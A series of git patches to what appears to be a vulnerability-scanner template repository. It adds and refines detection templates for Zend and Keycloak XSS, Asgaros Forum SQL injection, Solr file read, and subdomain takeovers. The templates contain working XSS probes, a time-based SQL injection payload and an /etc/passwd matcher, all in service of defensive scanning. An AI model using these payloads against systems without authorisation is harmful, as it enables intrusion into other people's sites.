b/vulnerabilities/zend/zend-v1-xss.yaml index 2f9dbda3b7..76de7d8ef7 100644 --- a/vulnerabilities/zend/zend-v1-xss.yaml +++ b/vulnerabilities/zend/zend-v1-xss.yaml @@ -4,21 +4,22 @@ info: name: ZendFramework 1.12.2 - Cross-Site Scripting author: c3l3si4n severity: medium - description: ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter. + description: | + ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter. reference: - https://twitter.com/c3l3si4n/status/1600035722148212737 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 + metadata: + verified: true + google-dork: inurl:"/tests/Zend/Http/" tags: zend,zendframework,xss requests: - method: GET path: - - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(1)>%20a='test'>" - - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(document.domain)%20a='test'>" + - "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(1)>" + - "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(document.domain)>" + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -29,11 +30,11 @@ requests: - '<img/src=x onerror=alert(document.domain)' condition: and - - type: status - status: - - 200 - - type: word part: header words: - - "text/html" + - text/html + + - type: status + status: + - 200 From 441a43ae08421c66a5e76c2a992d468cc2c98d36 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 7 Dec 2022 17:33:05 +0000 Subject: [PATCH 1114/1415] Auto Generated New Template Addition List [Wed Dec 7 17:33:05 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9be8811cad..01b21e6be3 100644 --- a/.new-additions +++ b/.new-additions @@ -3,3 +3,4 @@ exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml misconfiguration/installer/metaview-explorer-installer.yaml network/detection/redis-detect.yaml +vulnerabilities/zend/zend-v1-xss.yaml From 43bf747a6c7f0142b977d669c0cf7f94e9ceae58 Mon Sep 17 00:00:00 2001 From: ndmalc <> Date: Wed, 7 Dec 2022 22:34:02 +0100 Subject: [PATCH 1115/1415] Add template for CVE-2021-20323 --- cves/2021/CVE-2021-20323.yaml | 51 +++++++++++++++++++++++++++++++++++ 1 file changed, 51 insertions(+) create mode 100644 cves/2021/CVE-2021-20323.yaml diff --git a/cves/2021/CVE-2021-20323.yaml b/cves/2021/CVE-2021-20323.yaml new file mode 100644 index 0000000000..95fde9019a --- /dev/null +++ b/cves/2021/CVE-2021-20323.yaml @@ -0,0 +1,51 @@ +id: CVE-2021-20323 + +info: + name: Keycloak before 18.0.0 - Reflected XSS on clients-registrations endpoint + author: ndmalc + severity: medium + description: Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact. + reference: + - https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j + - https://nvd.nist.gov/vuln/detail/CVE-2021-20323 + - https://bugzilla.redhat.com/show_bug.cgi?id=2013577 + - https://access.redhat.com/security/cve/CVE-2021-20323 + - https://github.com/ndmalc/CVE-2021-20323 + - https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2021-20323 + cwe-id: CWE-79 + tags: keycloak,xss,reflected,unauth,cve,cve2021 + +variables: +# Variable to set the realm on which the request is executed +# Can be usefull to manually set something else than master as it could be path restricted +# nuclei does not allow user provided variable + realm: "master" + +requests: + - method: POST + headers: + Content-Type: application/json + path: + # Currently no nice way to have conditionnal testing + - "{{BaseURL}}/auth/realms/{{realm}}/clients-registrations/default" + - "{{BaseURL}}/auth/realms/{{realm}}/clients-registrations/openid-connect" + - "{{BaseURL}}/realms/{{realm}}/clients-registrations/default" + - "{{BaseURL}}/realms/{{realm}}/clients-registrations/openid-connect" + body: "{\"TestFlag\":1}" + + stop-at-first-match: true + matchers-condition: and + matchers: + # Uses a non-XSS match to avoid WAF detection + - type: word + words: + - "Unrecognized field \"TestFlag\"" + part: body + - type: word + words: + - "Content-Type: text/html" + part: header \ No newline at end of file From 295171f7bde018483d8d2f5bdfd5ce44a82c408d Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Wed, 7 Dec 2022 21:48:51 -0500 Subject: [PATCH 1116/1415] Create leadpages-takeover.yaml --- takeovers/leadpages-takeover.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 takeovers/leadpages-takeover.yaml diff --git a/takeovers/leadpages-takeover.yaml b/takeovers/leadpages-takeover.yaml new file mode 100644 index 0000000000..576d3594a2 --- /dev/null +++ b/takeovers/leadpages-takeover.yaml @@ -0,0 +1,27 @@ +id: leadpages-takeover + +info: + name: Leadpages takeover detection + author: philippedelteil + severity: high + reference: + - https://www.youtube.com/watch?v=HRFplefT46U + + tags: takeover + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - Host != ip + + - type: word + words: + - "<h1>We couldn't find that page</h1>" + - "<title>404 Not Found" + condition: and From 559e371bfd3902b57b1bb2eca6b383fe34c94dc8 Mon Sep 17 00:00:00 2001 From: th3r4id Date: Thu, 8 Dec 2022 10:23:35 +0530 Subject: [PATCH 1117/1415] Update github-takeover.yaml --- takeovers/github-takeover.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/takeovers/github-takeover.yaml b/takeovers/github-takeover.yaml index 8bc65bd66c..4cb6a03c21 100644 --- a/takeovers/github-takeover.yaml +++ b/takeovers/github-takeover.yaml @@ -23,6 +23,7 @@ requests: words: - "There isn't a GitHub Pages site here." - "For root URLs (like http://example.com/) you must provide an index.html file" + - "For root URLs (like http://example.com/) you must provide an" condition: or - type: dsl @@ -31,3 +32,6 @@ requests: - '!contains(host,"github.com")' - '!contains(host,"github.io")' condition: and + + + # updated by piyushchhiroliya From 5beef1c8b1882414bfada7e8b5b3cde075c800bf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 8 Dec 2022 10:28:00 +0530 Subject: [PATCH 1118/1415] Update github-takeover.yaml --- takeovers/github-takeover.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/takeovers/github-takeover.yaml b/takeovers/github-takeover.yaml index 4cb6a03c21..26fd790336 100644 --- a/takeovers/github-takeover.yaml +++ b/takeovers/github-takeover.yaml @@ -32,6 +32,3 @@ requests: - '!contains(host,"github.com")' - '!contains(host,"github.io")' condition: and - - - # updated by piyushchhiroliya From 357af30a0c81418ea1dcab19f847503db0c3c062 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 8 Dec 2022 10:28:34 +0530 Subject: [PATCH 1119/1415] Update github-takeover.yaml --- takeovers/github-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/github-takeover.yaml b/takeovers/github-takeover.yaml index 26fd790336..b722aede74 100644 --- a/takeovers/github-takeover.yaml +++ b/takeovers/github-takeover.yaml @@ -2,7 +2,7 @@ id: github-takeover info: name: github takeover detection - author: pdteam + author: pdteam,th3r4id severity: high reference: - https://github.com/EdOverflow/can-i-take-over-xyz From 5ac1e2721d45761a7813fe0883c75aa1778abd1b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 05:13:01 +0000 Subject: [PATCH 1120/1415] Auto Generated New Template Addition List [Thu Dec 8 05:13:01 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 01b21e6be3..18f7fb4bd4 100644 --- a/.new-additions +++ b/.new-additions @@ -2,5 +2,6 @@ exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml misconfiguration/installer/metaview-explorer-installer.yaml +network/detection/cisco-finger-detect.yaml network/detection/redis-detect.yaml vulnerabilities/zend/zend-v1-xss.yaml From 4edcbb15cce604f56851b5c6b54161378bc28f75 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 10:53:09 +0530 Subject: [PATCH 1121/1415] Update CVE-2021-20323.yaml --- cves/2021/CVE-2021-20323.yaml | 45 +++++++++++++++-------------------- 1 file changed, 19 insertions(+), 26 deletions(-) diff --git a/cves/2021/CVE-2021-20323.yaml b/cves/2021/CVE-2021-20323.yaml index 95fde9019a..6aa6d7e39c 100644 --- a/cves/2021/CVE-2021-20323.yaml +++ b/cves/2021/CVE-2021-20323.yaml @@ -1,51 +1,44 @@ id: CVE-2021-20323 info: - name: Keycloak before 18.0.0 - Reflected XSS on clients-registrations endpoint + name: Keycloak < 18.0.0 - Cross Site Scripting author: ndmalc severity: medium - description: Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact. + description: | + Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact. reference: - https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j - - https://nvd.nist.gov/vuln/detail/CVE-2021-20323 - https://bugzilla.redhat.com/show_bug.cgi?id=2013577 - https://access.redhat.com/security/cve/CVE-2021-20323 - https://github.com/ndmalc/CVE-2021-20323 - https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d + - https://nvd.nist.gov/vuln/detail/CVE-2021-20323 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 cve-id: CVE-2021-20323 - cwe-id: CWE-79 - tags: keycloak,xss,reflected,unauth,cve,cve2021 - -variables: -# Variable to set the realm on which the request is executed -# Can be usefull to manually set something else than master as it could be path restricted -# nuclei does not allow user provided variable - realm: "master" + tags: cve,cve2021,keycloak,xss requests: - method: POST + path: + - "{{BaseURL}}/auth/realms/master/clients-registrations/default" + - "{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect" + - "{{BaseURL}}/realms/master/clients-registrations/default" + - "{{BaseURL}}/realms/master/clients-registrations/openid-connect" + headers: Content-Type: application/json - path: - # Currently no nice way to have conditionnal testing - - "{{BaseURL}}/auth/realms/{{realm}}/clients-registrations/default" - - "{{BaseURL}}/auth/realms/{{realm}}/clients-registrations/openid-connect" - - "{{BaseURL}}/realms/{{realm}}/clients-registrations/default" - - "{{BaseURL}}/realms/{{realm}}/clients-registrations/openid-connect" - body: "{\"TestFlag\":1}" + + body: "{\"Test\":1}" stop-at-first-match: true matchers-condition: and matchers: - # Uses a non-XSS match to avoid WAF detection - type: word - words: - - "Unrecognized field \"TestFlag\"" part: body - - type: word words: - - "Content-Type: text/html" - part: header \ No newline at end of file + - 'Unrecognized field "Test' + + - type: word + part: header + words: + - text/html From af424a7d5c9ecc5103bd3003d428eee7f01ae837 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 10:55:41 +0530 Subject: [PATCH 1122/1415] Update CVE-2021-20323.yaml --- cves/2021/CVE-2021-20323.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/cves/2021/CVE-2021-20323.yaml b/cves/2021/CVE-2021-20323.yaml index 6aa6d7e39c..1343755085 100644 --- a/cves/2021/CVE-2021-20323.yaml +++ b/cves/2021/CVE-2021-20323.yaml @@ -15,6 +15,9 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-20323 classification: cve-id: CVE-2021-20323 + metadata: + verified: true + shodan-query: html:"Keycloak" tags: cve,cve2021,keycloak,xss requests: @@ -42,3 +45,7 @@ requests: part: header words: - text/html + + - type: status + status: + - 400 From d21844ebae8fe9c5bcfb79bfd97e74e53ffcc78b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 10:57:20 +0530 Subject: [PATCH 1123/1415] Update CVE-2021-20323.yaml --- cves/2021/CVE-2021-20323.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20323.yaml b/cves/2021/CVE-2021-20323.yaml index 1343755085..48f7128d8a 100644 --- a/cves/2021/CVE-2021-20323.yaml +++ b/cves/2021/CVE-2021-20323.yaml @@ -29,7 +29,7 @@ requests: - "{{BaseURL}}/realms/master/clients-registrations/openid-connect" headers: - Content-Type: application/json + Content-Type: application/json body: "{\"Test\":1}" From 0d3c48471eed44b395bc9e632bd8b7d075671b35 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 11:00:07 +0530 Subject: [PATCH 1124/1415] Update github-takeover.yaml --- takeovers/github-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/github-takeover.yaml b/takeovers/github-takeover.yaml index b722aede74..b383d6b14a 100644 --- a/takeovers/github-takeover.yaml +++ b/takeovers/github-takeover.yaml @@ -1,7 +1,7 @@ id: github-takeover info: - name: github takeover detection + name: Github Takeover Detection author: pdteam,th3r4id severity: high reference: From 2be41a05809b6a7d9101545f4aa39d3ad3a4ab5f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 05:35:37 +0000 Subject: [PATCH 1125/1415] Auto Generated New Template Addition List [Thu Dec 8 05:35:37 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 18f7fb4bd4..0e3b5d5929 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2021/CVE-2021-20323.yaml exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml From e4ecb47a264d0bf86a11cb509061a1d1818c0ee2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 05:55:10 +0000 Subject: [PATCH 1127/1415] Auto Generated CVE annotations [Thu Dec 8 05:55:10 UTC 2022] :robot: --- cves/2021/CVE-2021-20323.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20323.yaml b/cves/2021/CVE-2021-20323.yaml index 48f7128d8a..98a22911c8 100644 --- a/cves/2021/CVE-2021-20323.yaml +++ b/cves/2021/CVE-2021-20323.yaml @@ -14,10 +14,13 @@ info: - https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d - https://nvd.nist.gov/vuln/detail/CVE-2021-20323 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2021-20323 + cwe-id: CWE-79 metadata: - verified: true shodan-query: html:"Keycloak" + verified: "true" tags: cve,cve2021,keycloak,xss requests: From c3d1917fde9efd1f5633cf0b50796b1068764ceb Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 14:15:54 +0530 Subject: [PATCH 1128/1415] Update leadpages-takeover.yaml --- takeovers/leadpages-takeover.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/takeovers/leadpages-takeover.yaml b/takeovers/leadpages-takeover.yaml index 576d3594a2..6b483f5e8a 100644 --- a/takeovers/leadpages-takeover.yaml +++ b/takeovers/leadpages-takeover.yaml @@ -6,8 +6,9 @@ info: severity: high reference: - https://www.youtube.com/watch?v=HRFplefT46U - - tags: takeover + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/166 + - https://github.com/PushpenderIndia/subdover/issues/2 + tags: takeover,leadpages requests: - method: GET @@ -23,5 +24,6 @@ requests: - type: word words: - "

We couldn't find that page

" - - "404 Not Found" - condition: and + - "The page you’re looking for may have been moved" + - "Double-check that you have the right web address and give it another go!" + condition: or From 45576d3247870f0368da65f25d755382cb8216c3 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Thu, 8 Dec 2022 14:20:03 +0530 Subject: [PATCH 1129/1415] Added template for CVE-2021-24827 --- cves/2021/CVE-2021-24827.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-24827.yaml diff --git a/cves/2021/CVE-2021-24827.yaml b/cves/2021/CVE-2021-24827.yaml new file mode 100644 index 0000000000..93420ce7b0 --- /dev/null +++ b/cves/2021/CVE-2021-24827.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-24827 + +info: + name: Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection + author: theamanrawat + severity: critical + description: | + The Asgaros Forum WordPress plugin before 1.15.13 does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue. + reference: + - https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1 + - https://wordpress.org/plugins/asgaros-forum/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24827 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24827 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,asgaros-forum,unauth + +requests: + - raw: + - | + @timeout: 15s + GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "Asgaros Forum")' + condition: and \ No newline at end of file From 57708b145c5e0ee46e62032a516e0578b9b58598 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 14:33:38 +0530 Subject: [PATCH 1130/1415] Update CVE-2021-24827.yaml --- cves/2021/CVE-2021-24827.yaml | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-24827.yaml b/cves/2021/CVE-2021-24827.yaml index 93420ce7b0..378aa52ec4 100644 --- a/cves/2021/CVE-2021-24827.yaml +++ b/cves/2021/CVE-2021-24827.yaml @@ -11,13 +11,10 @@ info: - https://wordpress.org/plugins/asgaros-forum/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24827 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2021-24827 - cwe-id: CWE-89 metadata: - verified: "true" - tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,asgaros-forum,unauth + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,asgaros-forum,unauth requests: - raw: @@ -32,5 +29,5 @@ requests: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "text/html")' - - 'contains(body, "Asgaros Forum")' - condition: and \ No newline at end of file + - 'contains(body, "asgarosforum")' + condition: and From c5d280b3594ace2a7cf71c13c158b9f08ef2fc52 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 14:42:36 +0530 Subject: [PATCH 1132/1415] Update apache-solr-file-read.yaml --- .../apache/apache-solr-file-read.yaml | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index ef6252d216..be0bac2d85 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -35,18 +35,10 @@ requests: Accept-Language: en Connection: close - extractors: - - type: regex - internal: true - name: core - group: 1 - regex: - - '"name"\:"(.*?)"' - stop-at-first-match: true + matchers-condition: or matchers: - type: word - name: "windows" part: body words: - "bit app support" @@ -55,6 +47,13 @@ requests: condition: and - type: regex - name: "linux" regex: - "root:.*:0:0:" + + extractors: + - type: regex + name: core + group: 1 + regex: + - '"name"\:"(.*?)"' + internal: true From 4a3c11036ff633e3d0d5a53b5b245af1b4e3625e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:21:45 +0000 Subject: [PATCH 1134/1415] Auto Generated New Template Addition List [Thu Dec 8 09:21:45 UTC 2022] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 0e3b5d5929..e713da89c0 100644 --- a/.new-additions +++ b/.new-additions @@ -1,8 +1,10 @@ cves/2021/CVE-2021-20323.yaml +default-logins/apache/karaf-default-login.yaml exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml misconfiguration/installer/metaview-explorer-installer.yaml network/detection/cisco-finger-detect.yaml network/detection/redis-detect.yaml +technologies/apache/apache-karaf-panel.yaml vulnerabilities/zend/zend-v1-xss.yaml From d96973641dd4cfe31593b641e1c58dcac909485d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 8 Dec 2022 14:53:14 +0530 Subject: [PATCH 1136/1415] Rename CVE-2019-6802.yaml to cves/2019/CVE-2019-6802.yaml --- CVE-2019-6802.yaml => cves/2019/CVE-2019-6802.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename CVE-2019-6802.yaml => cves/2019/CVE-2019-6802.yaml (100%) diff --git a/CVE-2019-6802.yaml b/cves/2019/CVE-2019-6802.yaml similarity index 100% rename from CVE-2019-6802.yaml rename to cves/2019/CVE-2019-6802.yaml From 0cf1257964a6835fb693572d0dbbd9b398b21cda Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 14:53:17 +0530 Subject: [PATCH 1137/1415] Update homeworks-illumination.yaml --- iot/homeworks-illumination.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/iot/homeworks-illumination.yaml b/iot/homeworks-illumination.yaml index 7712bba606..37de8590f9 100644 --- a/iot/homeworks-illumination.yaml +++ b/iot/homeworks-illumination.yaml @@ -21,7 +21,6 @@ requests: - type: word words: - "HomeWorks Illumination Web Keypad" - - "lutron.js" - "Lutron HomeWorks" condition: and From 6fb0065035fb3b5e306e1088999be3ce324dc150 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:23:54 +0000 Subject: [PATCH 1138/1415] Auto Generated New Template Addition List [Thu Dec 8 09:23:53 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e713da89c0..d3b65b5fd8 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ default-logins/apache/karaf-default-login.yaml exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml +exposures/files/routes-ini.yaml misconfiguration/installer/metaview-explorer-installer.yaml network/detection/cisco-finger-detect.yaml network/detection/redis-detect.yaml From 687ba9ce7d124b463c61dc9b68763a9a0b771ca7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:25:24 +0000 Subject: [PATCH 1140/1415] Auto Generated New Template Addition List [Thu Dec 8 09:25:24 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d3b65b5fd8..7e7e1a380a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2019/CVE-2019-6802.yaml cves/2021/CVE-2021-20323.yaml default-logins/apache/karaf-default-login.yaml exposed-panels/aircube-dashboard-panel.yaml From 4c2b2f76fdf02c92493611ba411c12888d9060fe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:26:18 +0000 Subject: [PATCH 1141/1415] Auto Generated New Template Addition List [Thu Dec 8 09:26:18 UTC 2022] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 7e7e1a380a..58db1c86e4 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,7 @@ cves/2019/CVE-2019-6802.yaml cves/2021/CVE-2021-20323.yaml +cves/2022/CVE-2022-0826.yaml +cves/2022/CVE-2022-0948.yaml default-logins/apache/karaf-default-login.yaml exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml From 7295e688737ac5ad1437a42ded3a86388c1228a6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:27:36 +0000 Subject: [PATCH 1143/1415] Auto Generated New Template Addition List [Thu Dec 8 09:27:36 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 58db1c86e4..c7c7188512 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ cves/2019/CVE-2019-6802.yaml cves/2021/CVE-2021-20323.yaml +cves/2021/CVE-2021-24827.yaml cves/2022/CVE-2022-0826.yaml cves/2022/CVE-2022-0948.yaml default-logins/apache/karaf-default-login.yaml From 7182ecb48df220b695e9bc719b151f79769b5077 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 14:58:06 +0530 Subject: [PATCH 1144/1415] Update putty-private-key-disclosure.yaml --- exposures/files/putty-private-key-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/putty-private-key-disclosure.yaml b/exposures/files/putty-private-key-disclosure.yaml index 2f724217a0..5226890a13 100644 --- a/exposures/files/putty-private-key-disclosure.yaml +++ b/exposures/files/putty-private-key-disclosure.yaml @@ -27,10 +27,10 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "PuTTY-User-Key-File" - "Encryption:" - part: body condition: and - type: status From 50eb3e8fb9a604e8de60038d301150e7264ea92a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:29:00 +0000 Subject: [PATCH 1145/1415] Auto Generated New Template Addition List [Thu Dec 8 09:29:00 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index c7c7188512..8c61bc7c91 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ exposed-panels/aircube-dashboard-panel.yaml exposed-panels/mag-dashboard-panel.yaml exposed-panels/netris-dashboard-panel.yaml exposures/files/routes-ini.yaml +iot/homeworks-illumination.yaml misconfiguration/installer/metaview-explorer-installer.yaml network/detection/cisco-finger-detect.yaml network/detection/redis-detect.yaml From 5ab08d10976a078fa015262c55b4475c3d2955ed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Dec 2022 09:32:58 +0000 Subject: [PATCH 1146/1415] Auto Generated New Template Addition List [Thu Dec 8 09:32:58 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8c61bc7c91..f21725db0c 100644 --- a/.new-additions +++ b/.new-additions @@ -12,5 +12,6 @@ iot/homeworks-illumination.yaml misconfiguration/installer/metaview-explorer-installer.yaml network/detection/cisco-finger-detect.yaml network/detection/redis-detect.yaml +takeovers/leadpages-takeover.yaml technologies/apache/apache-karaf-panel.yaml vulnerabilities/zend/zend-v1-xss.yaml From 37915272e44d31db1dc88a16405a1210390950a2 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 8 Dec 2022 15:04:51 +0530 Subject: [PATCH 1148/1415] Update error-logs.yaml --- exposures/logs/error-logs.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml index 2d7fa5d6d2..b3eb38dbd0 100644 --- a/exposures/logs/error-logs.yaml +++ b/exposures/logs/error-logs.yaml @@ -1,7 +1,7 @@ id: error-logs info: - name: common error log files + name: Common Error Log Files author: geeknik,daffainfo,ELSFA7110,Hardik-Solanki severity: low tags: logs,exposure,error @@ -39,6 +39,7 @@ requests: - "{{BaseURL}}/{{Hostname}}/error.log" - 